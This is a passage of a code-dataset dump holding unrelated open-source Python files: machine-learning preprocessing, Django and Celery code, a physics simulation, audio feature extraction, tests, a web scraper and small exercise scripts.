time.time()\n embeddings = elmo.signatures['default'](tf.convert_to_tensor(x))[\"default\"]\n \n # sess = tf1.Session()\n # sess.run(tf1.global_variables_initializer())\n # sess.run(tf1.tables_initializer())\n # # return average of ELMo features\n # avg = sess.run(tf1.reduce_mean(embeddings,1))\n print(time.time() - cycle)\n return embeddings\n\nif __name__ == '__main__':\n start = time.time()\n print(time.asctime(time.localtime(start)))\n\n df = pd.read_csv('data/elmo_prepped_data.csv')\n chunks = [df[i:i+100] for i in range(0, df.shape[0], 100)]\n elmo_vects = [elmo_vectors(x['description']) for x in chunks]\n elmo_final_vects = np.concatenate(elmo_vects, axis = 0)\n\n pickle_out = open('data/elmo_vectors.pkl','wb')\n pickle.dump(elmo_final_vects, pickle_out)\n pickle_out.close()\n print(time.time() - start)","repo_name":"IHetterich/wine-classifier","sub_path":"src/in_development/elmo_vectorization.py","file_name":"elmo_vectorization.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"20186959135","text":"from rest_framework import serializers\nfrom .models import Client, Photo\nfrom source.image_crop import crop\n\n\nclass PhotoSerializer(serializers.ModelSerializer):\n \"\"\" Serializer for photo model \"\"\"\n class Meta:\n model = Photo\n fields = '__all__'\n\nclass ClientSerializer(serializers.ModelSerializer):\n \"\"\" Serializer for Client model with OneToOne \"\"\"\n photo = PhotoSerializer()\n left = serializers.IntegerField(allow_null=True, write_only=True)\n top = serializers.IntegerField(allow_null=True, write_only=True)\n right = serializers.IntegerField(allow_null=True, write_only=True)\n bottom = serializers.IntegerField(allow_null=True, write_only=True)\n\n class Meta:\n model = Client\n fields = '__all__'\n\n def create(self, validated_data, *args, **kwargs):\n photo_data = validated_data.pop('photo')\n photo = Photo.objects.create(**photo_data)\n left = validated_data.pop('left')\n top = validated_data.pop('top')\n right = validated_data.pop('right')\n bottom = validated_data.pop('bottom')\n crop(str(photo.file), left, top, right, bottom)\n client = Client.objects.create(photo=photo, **validated_data)\n\n return client\n\n","repo_name":"injirez/redsoft","sub_path":"redsoft/clients/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13097412913","text":"import phd\nimport numpy as np\n\n# to run:\n# $ mpirun -n 4 python explosion_2d_random.py\n# for parallel or\n# $ python explosion_2d_random.py\n# for single core\n\ndef create_particles(dim=2, n=10000, gamma=1.4):\n\n # create particle container\n particles = phd.HydroParticleCreator(n, dim=2)\n\n c = 0.5\n for i in range(n):\n\n x = np.random.rand()\n y = np.random.rand()\n\n if (x-c)**2 + (y-c)**2 <= 0.25**2:\n particles[\"density\"][i] = 1.0\n particles[\"pressure\"][i] = 1.0\n else:\n particles[\"density\"][i] = 0.125\n particles[\"pressure\"][i] = 0.1\n\n particles[\"position-x\"][i] = x\n particles[\"position-y\"][i] = y\n particles[\"ids\"][i] = i\n\n # zero out velocities and set particle type\n particles[\"velocity-x\"][:] = 0.0\n particles[\"velocity-y\"][:] = 0.0\n\n return particles\n\ndim = 2; gamma = 5./3.\nparticles = phd.distribute_initial_particles(\n create_particles, dim=dim, gamma=gamma)\n\n# computation related to boundaries\ndomain_manager = phd.DomainManager(\n xmin=[0., 0.], xmax=[1., 1.],\n initial_radius=0.1)\n\n# create voronoi mesh\nmesh = phd.Mesh(relax_iterations=10)\n\n# computation\nintegrator = phd.MovingMeshMUSCLHancock()\nintegrator.set_mesh(mesh)\nintegrator.set_riemann(phd.HLLC())\nintegrator.set_particles(particles)\nintegrator.set_domain_manager(domain_manager)\nintegrator.set_boundary_condition(phd.Reflective())\nintegrator.set_reconstruction(phd.PieceWiseLinear())\nintegrator.set_equation_state(phd.IdealGas(gamma=gamma))\n\nsim_name = \"explosion\"\nif phd._in_parallel:\n integrator.set_load_balance(phd.LoadBalance())\n sim_name = \"explosion_mpi\"\n\n# add finish criteria\nsimulation_time_manager = phd.SimulationTimeManager()\nsimulation_time_manager.add_finish(phd.Time(time_max=0.1))\n\n# output last step\noutput = phd.FinalOutput()\noutput.set_writer(phd.Hdf5())\nsimulation_time_manager.add_output(output)\n\n# Create simulator\nsimulation = phd.Simulation(simulation_name=sim_name)\nsimulation.set_integrator(integrator)\nsimulation.set_simulation_time_manager(simulation_time_manager)\nsimulation.initialize()\nsimulation.solve()\n","repo_name":"rickyfernandez/phd-code","sub_path":"test_suite/explosion/explosion_2d_random.py","file_name":"explosion_2d_random.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"681255345","text":"import os, glob, sndhdr\nimport json\nimport base64\nimport numpy as np\nfrom scipy.io import wavfile, savemat\nfrom features import fbank, mfcc # python_speech_features\nimport fnmatch\nimport pdb\n\ndef melfilter(N, freq):\n melFreq = 2595*np.log10(1+freq/700)\n\n maxF = np.max(melFreq)\n minF = np.min(melFreq)\n melBinWidth = (maxF-minF)/(N+1)\n filt = np.zeros((N, len(freq)), dtype='float32')\n\n for n in range(0, N):\n idx = np.where( melFreq>=(n*melBinWidth+minF) & melFreq<=((n+2)*melBinWidth+minF) )\n binWidth = len(idx)\n\n filt[n, idx] = np.bartlett(binWidth)\n\n return filt\n\ndef wav2fbank(wavFile, fs=16000, maxLen_s=None):\n\n if isinstance(wavFile, str):\n (fs, wav) = wavfile.read(wavFile)\n assert fs == 16000 # requirement for now\n elif isinstance(wavFile, np.ndarray):\n wav = wavFile\n\n winlen = 0.025\n winstep = 0.015\n nfft = np.int(np.power(2, np.ceil(np.log2(winlen*fs))))\n winfunc = lambda x: np.hanning(x)\n nfilt = 40\n preemph = 0.97\n\n if np.ndim(wav) == 2: # Multiple channels; just take left one\n wav = wav[:,0]\n if maxLen_s is not None:\n maxSamp = maxLen_s * fs\n wav = wav[:maxSamp]\n\n if True:\n M, E = fbank(wav, fs, winlen=winlen, winstep=winstep, nfilt=nfilt, nfft=nfft, winfunc=winfunc, preemph=preemph)\n\n logM = np.log(M)\n else:\n logM = mfcc(wav, fs, numcep=16, winlen=winlen, winstep=winstep, nfilt=nfilt, nfft=nfft, winfunc=winfunc, preemph=preemph)\n logM = np.swapaxes(logM, 0, 1)\n\n return logM\n\ndef find_audio_files(wavDir, matcher=None):\n\n # Find all audio files in the directory\n allFiles = glob.glob(os.path.join(wavDir,'*.*'))\n audioFiles = []\n for f in allFiles:\n if matcher is not None and not fnmatch.fnmatch(f, matcher):\n continue\n chk = sndhdr.what(f)\n if chk is not None:\n audioFiles.append(f)\n\n return audioFiles\n\ndef wav2fbank_batch(wavDir, matcher=None):\n\n audioFiles = find_audio_files(wavDir, matcher)\n logM = []\n for f in audioFiles:\n logM.append(wav2fbank(f))\n\n return logM, audioFiles\n\ndef find_bin_files(wavDir, matcher=None):\n\n # Find all bin files in the directory\n allFiles = glob.glob(os.path.join(wavDir,'*.bin'))\n binFiles = []\n for f in allFiles:\n if matcher is not None and not fnmatch.fnmatch(f, matcher):\n continue\n binFiles.append(f)\n\n return binFiles\n\ndef load_bin(fname, nfilt=40):\n\n f = open(fname,'r')\n x = np.fromfile(f,dtype=np.int16)\n f.close()\n\n x = x.reshape(x.shape[0] / nfilt, nfilt)\n x = np.swapaxes(x, 0, 1)\n\n return x\n\ndef append_padded(logM, data, targetSize=None):\n\n if targetSize is not None:\n if data.shape[1] < targetSize:\n data = np.concatenate((data, np.zeros((data.shape[0], targetSize-data.shape[1]))), axis=1)\n elif data.shape[1] > targetSize:\n data = data[:,:(targetSize-data.shape[1])]\n\n logM.append(data)\n\n return logM\n\ndef bin2fbank_batch(dirName, matcher=None, targetSize=None):\n\n files = find_bin_files(dirName, matcher)\n logM = []\n for f in files:\n data = load_bin(f)\n logM = append_padded(logM, data, targetSize=targetSize)\n\n return logM, files\n\ndef bin2mat(inFile, outFile=None):\n\n if outFile is None:\n outFile = inFile.replace('.bin','.mat')\n\n features = load_bin(inFile)\n savemat(outFile, {'features': features})\n\ndef bin2mat_all(dirName):\n\n files = find_bin_files(dirName)\n for f in files:\n bin2mat(f)\n\ndef bin2mat_batch(dirName, outFile, matcher=None, targetSize=None):\n\n logM, files = bin2fbank_batch(dirName, matcher=matcher, targetSize=targetSize)\n logM = np.array(logM)\n savemat(outFile, {'logM':logM, 'files':files})\n\ndef load_serverfeats(fname):\n\n f = open(fname, 'r')\n\n s = f.read()\n f.close()\n datas = s.split(\"}\")\n\n feats = []\n for data in datas:\n if len(data) <= 2:\n continue\n\n tmp = data + \"}\"\n jdata = json.loads(tmp)\n\n if not '+okay' in jdata['id']:\n continue\n\n n = jdata['num_cols']\n bindata = base64.b64decode(jdata['payload'])\n x = np.fromstring(bindata,dtype=np.int8)\n istart = x.shape[0] % n\n x2 = x[istart::].reshape((x.shape[0]/n,n))\n feats.append(x2)\n\n feats = np.array(feats)\n return feats\n\ndef serverfeats2mat(inFile, outFile, targetSize=None):\n\n feats = load_serverfeats(inFile)\n logM = []\n for data in feats:\n logM = append_padded(logM, data.swapaxes(0, 1), targetSize=targetSize)\n\n logM = np.array(logM)\n savemat(outFile, {'logM':logM})\n\n","repo_name":"hello/onsei","sub_path":"dataprep/audioproc.py","file_name":"audioproc.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40251959608","text":"'''\nhttps://leetcode-cn.com/problems/factorial-trailing-zeroes\n\n给定一个整数 n,返回 n! 结果尾数中零的数量。\n示例 1:\n输入: 3\n输出: 0\n解释: 3! = 6, 尾数中没有零。\n示例 2:\n输入: 5\n输出: 1\n解释: 5! = 120, 尾数中有 1 个零.\n说明: 你算法的时间复杂度应为 O(log n) 。\n'''\n\nclass Solution:\n def trailingZeroes(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n \n\n\nif __name__ == '__main__':\n s = Solution()\n # ret = s.\n print(s)\n","repo_name":"chanfengsr/AllPrivateProject","sub_path":"Python/LeetCodeTraining/题库/0172 阶乘后的零(Factorial Trailing Zeroes).py","file_name":"0172 阶乘后的零(Factorial Trailing Zeroes).py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"70235024569","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n if needle == \"\":\n return 0\n for i in range(len(haystack)):\n if haystack[i:i+len(needle)] == needle:\n return i\n return -1\n\n\nif __name__ == '__main__':\n Sol = Solution()\n res = Sol.strStr(haystack=\"aaaaa\", needle=\"bba\")\n print(res)","repo_name":"codershenghai/PyLeetcode","sub_path":"easy/0028.implement-strStr().py","file_name":"0028.implement-strStr().py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38186440353","text":"import pytest\nimport os\nfrom flask import Response\nfrom tests.client import MDMClient\nfrom commandment.mdm import CommandStatus\nfrom commandment.models import Command, Device\n\nTEST_DIR = os.path.realpath(os.path.dirname(__file__))\n\n\n@pytest.fixture()\ndef installed_application_list_response():\n with open(os.path.join(TEST_DIR, '../../testdata/InstalledApplicationList/10.11.x.xml'), 'r') as fd:\n plist_data = fd.read()\n\n return plist_data\n\n\n@pytest.fixture(scope='function')\ndef installed_application_list_command(session):\n c = Command(\n uuid='00000000-1111-2222-3333-444455556666',\n request_type='InstalledApplicationList',\n status=CommandStatus.Sent.value,\n parameters={},\n )\n session.add(c)\n session.commit()\n\n\n@pytest.mark.usefixtures(\"device\", \"installed_application_list_command\")\nclass TestInstalledApplicationList:\n\n def test_installed_application_list_response(self, client: MDMClient, installed_application_list_response: str, session):\n response: Response = client.put('/mdm', data=installed_application_list_response, content_type='text/xml')\n assert response.status_code != 410\n assert response.status_code == 200\n\n d: Device = session.query(Device).filter(Device.udid == '00000000-1111-2222-3333-444455556666').one()\n ia = d.installed_applications\n assert len(ia) == 3\n","repo_name":"cmdmnt/commandment","sub_path":"tests/mdm/test_installed_application_list.py","file_name":"test_installed_application_list.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":277,"dataset":"github-code","pt":"77"} +{"seq_id":"35317157344","text":"\nfrom Qt.CanQt import CanWindow\nfrom Qt.Trace32Qt import Trace32Window\n\nfrom templates import *\nfrom Lib.Inst.Trace32Lib import *\nfrom Lib.Inst.canLib import *\nfrom Lib.Inst.visaLib import *\n\n\nclass InstWindow(QWidget):\n def __init__(self):\n QWidget.__init__(self)\n\n # SET AS IMAGE WIDGETS\n self.ui_inst = Ui_inst()\n self.ui_inst.setupUi(self)\n\n # QWidget 선언\n self.canWidget = CanWindow()\n self.t32Widget = Trace32Window()\n\n self.ui_inst.stackedWidget.addWidget(self.canWidget)\n self.ui_inst.stackedWidget.addWidget(self.t32Widget)\n self.ui_inst.stackedWidget.setCurrentWidget(self.canWidget)\n\n self.connectBtnInit()\n\n self.df_inst = None\n self.update_tbl_from_df()\n\n def connectBtnInit(self):\n self.ui_inst.btn_TRACE32.clicked.connect(self.func_btn_TRACE32)\n self.ui_inst.btn_CAN.clicked.connect(self.func_btn_CAN)\n self.ui_inst.btn_Visa.clicked.connect(self.func_btn_Visa)\n self.ui_inst.btn_Refresh.clicked.connect(self.update_tbl_from_df)\n\n def func_btn_TRACE32(self):\n self.ui_inst.stackedWidget.setCurrentWidget(self.t32Widget)\n\n def func_btn_CAN(self):\n self.ui_inst.stackedWidget.setCurrentWidget(self.canWidget)\n\n def func_btn_Visa(self):\n self.ui_inst.stackedWidget.setCurrentWidget(self.ui_inst.new_page)\n\n def update_tbl_from_df(self):\n # 테이블 위젯 값 쓰기\n self.ui_inst.tbl_inst_status.clear()\n # Select Dataframe\n self.df_inst = self._get_inst_status()\n logging_print(\"Current Test Environment\\n{}\\n\".format(self.df_inst))\n # Table Contents\n self.ui_inst.tbl_inst_status.setColumnCount(len(self.df_inst.columns))\n self.ui_inst.tbl_inst_status.setHorizontalHeaderLabels(self.df_inst.columns.tolist())\n self.ui_inst.tbl_inst_status.setRowCount(len(self.df_inst.index))\n\n for r in range(len(self.df_inst.index)):\n for c in range(len(self.df_inst.columns)):\n self.ui_inst.tbl_inst_status.setItem(r, c, QTableWidgetItem(str(self.df_inst.iloc[r][c])))\n self.ui_inst.tbl_inst_status.resizeColumnsToContents()\n\n def _get_inst_status(self):\n lst_inst_data = []\n lst_inst = [i for i in Configure.set.sections() if 'system' not in i and 'XCP' not in i]\n for inst in lst_inst:\n if Configure.set[inst]['type'] == 'T32':\n lst_inst_data.append([inst, t32.status])\n elif Configure.set[inst]['type'] == 'can':\n lst_inst_data.append([inst, False if canBus.devs[inst].status == CAN_ERR else True])\n else:\n lst_inst_data.append([inst, visa.status[inst]])\n return pd.DataFrame(lst_inst_data, columns=['Name', 'Connect'])\n\n","repo_name":"yongheelee87/DevEnv","sub_path":"SwVerification/Qt/InstQt.py","file_name":"InstQt.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9253828045","text":"from exif import Image as ExifImage\n\nfrom veems import images\n\n\ndef test_remove_exif_data(uploaded_img_with_exif):\n img_file_obj, _ = uploaded_img_with_exif\n\n result_file_obj = images.remove_exif_data(img_file_obj)\n\n # Check all exif data was removed\n exif_image = ExifImage(result_file_obj)\n assert exif_image.list_all() == []\n","repo_name":"VeemsHQ/veems","sub_path":"tests/test_images.py","file_name":"test_images.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"77"} +{"seq_id":"36270105983","text":"from django.http import JsonResponse\nfrom django.views import View\nfrom orders import tasks\nimport logging\nimport time\n\njs = logging.getLogger('js')\ntf = logging.getLogger('tf')\nstash = logging.getLogger('logstash')\n\n\nclass TestCelery(View):\n\n def get(self, request, *args, **kwargs):\n h2 = tasks.sub.delay(23, 100)\n\n js.error('test eror')\n tf.error('test eror')\n stash.error('test eror')\n\n # print(h2)\n # print(h2.wait()) 获取返回值 但是这是要等着celery执行完后 就不存在异步效果\n # h2 = tasks.sub.apply_async(queue='low_priorityy', args=(10, 50))\n # h2 = tasks.sub.apply_async(queue='high_priority', kwargs={'a': 10, 'b': 5})\n task_id = h2.task_id\n return JsonResponse(data={'task_id': task_id}, status=200)\n\nclass Te(View):\n\n def get(self, request, *args, **kwargs):\n\n js.error(f'test eror-{time.time()}')\n tf.error('test eror')\n stash.error('test eror')\n return JsonResponse(data={'task_id': 2}, status=200)\n\n\n\n\"\"\"\nfrom celery.result import AsyncResult\nres=AsyncResult(\"62051878-ca77-4895-a61f-6f9525681347\") # 参数为task id\nresult = res.result # 通过task_id 获取 异步执行返回结果\nres.status 表示 运行状态\nres.traceback 表示运行的异常错误\n\n\n\ncd 进入manage.py同级目录\n$ pip install -r requirements.txt\n$ ./manage.py makemigrations\n$ ./manage.py migrate\n$ python3 -m celery -A core.celery worker --loglevel INFO (-P eventlet windows下使用) \n$ python3 -m celery -A core.celery beat --loglevel INFO # You need to run on other terminal.\n$ ./manage.py shell\n$ python3 -m celery purge -Q [queue_name] 清空队列\n\"\"\"\n\n##########\n\n\"\"\"\ncelery+supervisor启动works和beat\n只需要修改celery.ini配置文件里面的执行命令即可\n\n配置celery.ini\nroot@StarMeow-Svr:~/django-web# cd Supervisor/\n(Supervisor) root@StarMeow-Svr:~/django-web/Supervisor# ls\ncelery.ini supervisord.conf\n(Supervisor) root@StarMeow-Svr:~/django-web/Supervisor# vim celery.ini\ncelery.ini\n\n# 配置内容 \n[program:celery] \n# celery命令的绝对路径 \ncommand=/root/.pyenv/versions/StarMeow/bin/celery -A StarMeow worker -B -l info \n# 项目路径 \ndirectory=/root/django-web/StarMeow \n# 日志文件路径 \nstdout_logfile=/var/log/myweb/celery.log \n# 自动重启 \nautorestart=true \n# 如果设置为true,进程则会把标准错误输出到supervisord后台的标准输出文件描述符 \nredirect_stderr=true \n重载\n因为之前配置了自动重载脚本,只需要执行下即可\n\n(Supervisor) root@StarMeow-Svr:~/django-web/Supervisor# cd ..\nroot@StarMeow-Svr:~/django-web# ./SvReload.sh \n正在更新Supervisor配置···\nRestarted supervisord\n\n查看celery日志\nroot@StarMeow-Svr:~/django-web# cat /var/log/myweb/celery.log\n\n\n# 守护进程\ncelery multi start w1 -A celery_tasks.main -l info --logfile=./celerylog.log\n# 停止和重启 分别将 start 改为 stop / restart\n守护进程的另一种方式,使用supervisor,这是一个管理进程的工具,这种启动方式就是用supervisor接管celery\n\n\npip install django-celery-results 这是保存celery执行后的结果\n2.配置settings.py,注册app\n\nINSTALLED_APPS = (\n ...,\n 'django_celery_results',\n)\n4.修改backend配置,将redis改为django-db\n\n#CELERY_RESULT_BACKEND = 'redis://10.1.210.69:6379/0' # BACKEND配置,这里使用redis\n\nCELERY_RESULT_BACKEND = 'django-db' #使用django orm 作为结果存储\n5.修改数据库\n\npython3 manage.py migrate django_celery_results\n\n\n\npply_async可以使用并发,这是其强大之处\n\n# -c参数:表示worker创建的并发线程数 启动多个队列\n(venv) $ celery -A proj worker -l info -Q default -c 2\n(venv) $ celery -A proj worker -l info -Q low_priority -c 1\n(venv) $ celery -A proj worker -l info -Q high_priority -c 4\n指定并发池的上下限\n\n​\n(venv) $ celery -A proj worker -l info -Q default --autoscale 4,2\n(venv) $ celery -A proj worker -l info -Q low_priority --autoscale 2,1\n(venv) $ celery -A proj worker -l info -Q high_priority --autoscale 8,4\n保持并发数接近CPU核心数量。如果服务器有4个核心CPU,则最大并发数应该是4,更大的数字可工作但效率会下降\n\n任务可以在很多单独的任务队列中执行,但将所有内容放在单个队列中会更好.\n\n在单个队列中避免FIFO,需对每个任务定义优先级,整数范围为0-9。\nadd.apply_async(queue='high_priority', priority=0, kwargs={'a': 10, 'b': 5})\nadd.apply_async(queue='high_priority', priority=5, kwargs={'a': 10, 'b': 5})\nadd.apply_async(queue='high_priority', priority=9, kwargs={'a': 10, 'b': 5})\n\n不同app task指定不同的队列\nCELERY_QUEUES = (\nQueue(\"default\",Exchange(\"default\"),routing_key=\"default\"),\nQueue(\"for_task_A\",Exchange(\"for_task_A\"),routing_key=\"for_task_A\"),\nQueue(\"for_task_B\",Exchange(\"for_task_B\"),routing_key=\"for_task_B\") \n)\n\nCELERY_ROUTES = {\n'tasks.taskA':{\"queue\":\"for_task_A\",\"routing_key\":\"for_task_A\"},\n'tasks.taskB':{\"queue\":\"for_task_B\",\"routing_key\":\"for_task_B\"}\n}\n3.启动worker来指定task\n\ncelery -A tasks worker -l info -n workerA.%h -Q for_task_A\n\n\n、time_limit和soft_time_limit区别\n\ntime_limit : 执行超时,结束signal 9 (SIGKILL) 执行的子进程,状态:\"status\": \"FAILURE\" 超过直接杀死当前执行任务的worker 日志会抛出一个错误\nsoft_time_limit :执行超时,用一个异常SoftTimeLimitExceeded来捕捉,状态:\"status\": \"SUCCESS\"\n目前只能在linux操作系统才有效\n\nhandler_upload_data.apply_async((full_path,), soft_time_limit=10)\nhandler_upload_data.apply_async((full_path,), time_limit=10)\n\ncelery指定任务执行时间\nimport datetime\n \n \ndef in_run_time(start, end):\n\n 用来给任务判断,在不在可执行的时间里,是不是需要丢到定时里\n Args:\n start: 任务开始执行的时间,格式如 \"00:00:00\"\n end: 任务停止执行的时间,格式如 \"07:00:00\"\n Returns:\n \n current_date = str(datetime.datetime.now().date()) + \" \"\n start_time = datetime.datetime.strptime(current_date + start, '%Y-%m-%d %H:%M:%S')\n end_time = datetime.datetime.strptime(current_date + end, '%Y-%m-%d %H:%M:%S')\n current_date = datetime.datetime.now()\n if (start_time < current_date) and (current_date < end_time):\n return True\n else:\n return False\n \n \ndef get_nextday_run_time(start, end):\n \n 根据当前时间,和起止时间,得出该任务应该执行的时间。\n Args:\n start: 任务开始执行的时间,格式如 \"00:00:00\"\n end: 任务停止执行的时间,格式如 \"07:00:00\"\n Returns:\n \n current_date = datetime.datetime.now().date()\n end_time = datetime.datetime.strptime(str(current_date) + \" \" + end, '%Y-%m-%d %H:%M:%S')\n current_time = datetime.datetime.now()\n # 如果现在还没到今天的执行时间,那么任务放到今天的执行时间来执行\n if current_time > end_time:\n current_date += datetime.timedelta(days=1)\n run_time_str = str(current_date) + \" \" + start\n # 执行-北京时间\n run_time = datetime.datetime.strptime(run_time_str, '%Y-%m-%d %H:%M:%S')\n run_time = run_time + datetime.timedelta(hours=-8)\n return run_time\n \n \ndef get_run_time_by_bj_time(bj_time):\n \n 将时间格式字符串转换为datetime格式\n Args:\n bj_time: 指定执行时间 type-str 如 \"2019-08-21 13:21:00\"\n Returns:\n \n run_time = datetime.datetime.strptime(bj_time, '%Y-%m-%d %H:%M:%S')\n run_time = run_time + datetime.timedelta(hours=-8)\n return run_time\n \nstart = \"00:00:00\"\nend = \"07:00:00\"\nwork.apply_async(args=[scan_data], eta=get_nextday_run_time(start, end), \n queue=\"队列名,没有可删除参数\", routing_key=\"队列key,没有可删除参数\")\n\n\"\"\"\n","repo_name":"hvag-ab/dispatch","sub_path":"djcelery/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7807,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"23473436927","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\ndb = client.dbsparta\n\nheaders = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\ndata = requests.get('https://movie.naver.com/movie/sdb/rank/rmovie.nhn?sel=pnt&date=20200303',headers=headers)\n\nsoup = BeautifulSoup(data.text, 'html.parser')\ntr_tag= soup.select('#old_content > table > tbody > tr')\nfor tr in tr_tag:\n\n rank = tr.select_one('#old_content > table > tbody > tr > td:nth-child(1) >img ')\n\n title= tr.select_one('#old_content > table > tbody > tr > td.title > div > a')\n star = tr.select_one('#old_content > table > tbody > tr > td.point')\n if title is not None:\n doc = {'rank':rank['alt'], 'name' : title.text , 'star' :star.text}\n db.movies.insert_one(doc)","repo_name":"jtheeeeee/scc_prac","sub_path":"sparta/pythonprec/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10916089333","text":"# Crie um programa que leia o nome de uma cidade e diga se ela\n# começa ou não como nome \"SANTO\"\n\ncity = str(input('Digite o nome de uma cidade: ')).strip().upper()\nreturnCity = city.split()\nprint('SANTO' in returnCity[0])\n\n# Ou\n# city = str(input('Digite o nome de uma cidade: ')).strip()\n# print(city[:5].upper() == 'SANTO')\n\n\n\n","repo_name":"leo-allves/python-curso-em-video","sub_path":"pynthon-basico/PythonExercicios/ex024.py","file_name":"ex024.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41966059937","text":"usrInput = input().split(\" \")\nn = int(usrInput[0])\nm = int(usrInput[1])\nsizes = []\nfor i in range(n):\n sizes.append(int(input()))\n\ncolors = []\nfor i in range(m):\n colors.append(int(input()))\n\nsizes.sort()\ncolors.sort()\n\nsizeIndex = 0\nsum = 0\ni = 0\nwhile i < len(colors):\n if colors[i] > sizes[sizeIndex]:\n sizeIndex += 1\n else:\n sum += sizes[sizeIndex] - colors[i]\n i += 1\nprint(sum)","repo_name":"sonas939/CPProblems","sub_path":"Lab2/roompainting.py","file_name":"roompainting.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"911027072","text":"def a():\n antStud = int(input('Hvor mange studenter? Svar: '))\n antFag = int(input('Hvor mage fag? Svar: '))\n\n for x in range(antStud):\n for y in range(antFag):\n print(\"Stud \" + str(x + 1) + \" elsker Emne \" + str(y + 1),end=\" ; \")\n print()\n\n#a()\n\n\ndef b():\n for x in range(24):\n for y in range(60):\n print(str(x) + \":\" + str(y))\n\n#b()\n\n\ndef c():\n for x in range(10):\n for y in range(10):\n sum = (x + 1) * (y + 1)\n print(sum,end=\" \")\n print()\n\n#c()","repo_name":"KristofferNyvoll/ntnu","sub_path":"TDT4110_ITGK/Assignment_3/intro_nested.py","file_name":"intro_nested.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5641744418","text":"def make_album(artist, title, num_songs=0):\n \"\"\"Build a dictionary containing information about an album.\"\"\"\n album_dict = {\n 'artist': artist.title(),\n 'title': title.title(),\n }\n if num_songs:\n album_dict['num_songs'] = num_songs\n return album_dict\n\n# Prepare the prompts.\ntitle_prompt = \"\\nWhat album are you thinking of? \"\nartist_prompt = \"Who's the artist? \"\n\n# Let the user know how to quit.\nprint(\"Enter 'quit' at any time to stop.\")\n\nwhile True:\n title = input(title_prompt)\n if title == 'quit':\n break\n \n artist = input(artist_prompt)\n if artist == 'quit':\n break\n\n album = make_album(artist, title)\n print(album)\n\nprint(\"\\nThanks for responding!\")\n","repo_name":"ehmatthes/pcc_3e","sub_path":"solution_files/chapter_08/user_albums.py","file_name":"user_albums.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":571,"dataset":"github-code","pt":"77"} +{"seq_id":"32395577892","text":"from server import *\nimport math\n\ndef read(inpu):\n lis = []\n for x in inpu:\n if x == \"C\":\n if len(lis) != 0:\n del lis[len(lis)-1]\n elif x == \"CE\":\n del lis[:]\n else:\n lis.append(x)\n return lis\n\ndef show(inpu):\n string = \"\"\n for x in inpu:\n string += str(x)\n return string\n \ndef intep(inpu):\n string = \"\"\n for x in inpu:\n if x == \"sin(\":\n string += \"math.sin(\"\n elif x == \"cos(\":\n string += \"math.cos(\"\n elif x == \"tan(\":\n string += \"math.tan(\"\n elif x == \"sqrt(\":\n string += \"math.sqrt(\"\n elif x == \"log(\":\n string += \"math.log(\"\n else:\n string += str(x)\n return string\n \ndef displa(x):\n display = \"\"\n global n\n global user_input\n global ans\n if (x == \"+\" or x == \"-\" or x == \"*\" or x == \"/\") and history[0] == []:\n n = 0\n user_input.append(ans)\n user_input.append(x)\n history[n] = user_input\n do = read(user_input)\n display = show(do)\n elif x == \"=\" and user_input != []:\n for i in range(len(history)-1, 0, -1):\n history[i] = history[i-1][:]\n del history[0][:]\n do = read(history[1])\n display = intep(do)\n try:\n ans = eval(display)\n display = str(ans)\n except SyntaxError:\n display += \")\"\n try:\n ans = eval(display)\n display = str(ans)\n except SyntaxError:\n display = \"syntax error\"\n except ValueError:\n display = \"math error\"\n except:\n display = \"something wrong\"\n except ValueError:\n display = \"math error\"\n except:\n display = \"something wrong\"\n\n del user_input[:]\n elif x == \"=\":\n display = ans\n elif x == \"<\":\n if n != 4 and history[n+1] != []:\n n += 1\n do = read(history[n])\n display = show(do)\n elif x == \">\":\n if n != 0:\n n -= 1\n do = read(history[n])\n display = show(do)\n else:\n n = 0\n user_input.append(x)\n history[n] = user_input\n do = read(user_input)\n display = show(do)\n return display","repo_name":"michaevelli/calculator","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39928008223","text":"import json\nimport redis\nfrom helpers.logger import getLogger\nimport requests\nimport time\nfrom requests_ip_rotator import ApiGateway\nimport random\nimport string\n\nlogger = getLogger(__name__)\n\n\nclass 